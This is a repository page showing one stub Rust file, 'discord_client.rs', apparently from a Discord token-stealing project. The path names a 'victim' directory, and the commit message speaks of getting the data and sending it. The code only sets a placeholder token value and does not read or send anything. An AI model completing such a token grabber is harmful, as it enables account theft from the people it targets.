~/hooky

hooky/victim/src/all_data/discord_client.rs -rw-r--r-- 186 B
583b1720 — Arthur Melton beging to get the data and send it 2 years ago
1
2
3
4
5
6
7
8
use crate::data::Sends;

impl Sends {
    #[cfg(feature = "discord-client")]
    pub fn discord_client(&mut self) {
        self.discord_client_token = Some("123".to_string());
    }
}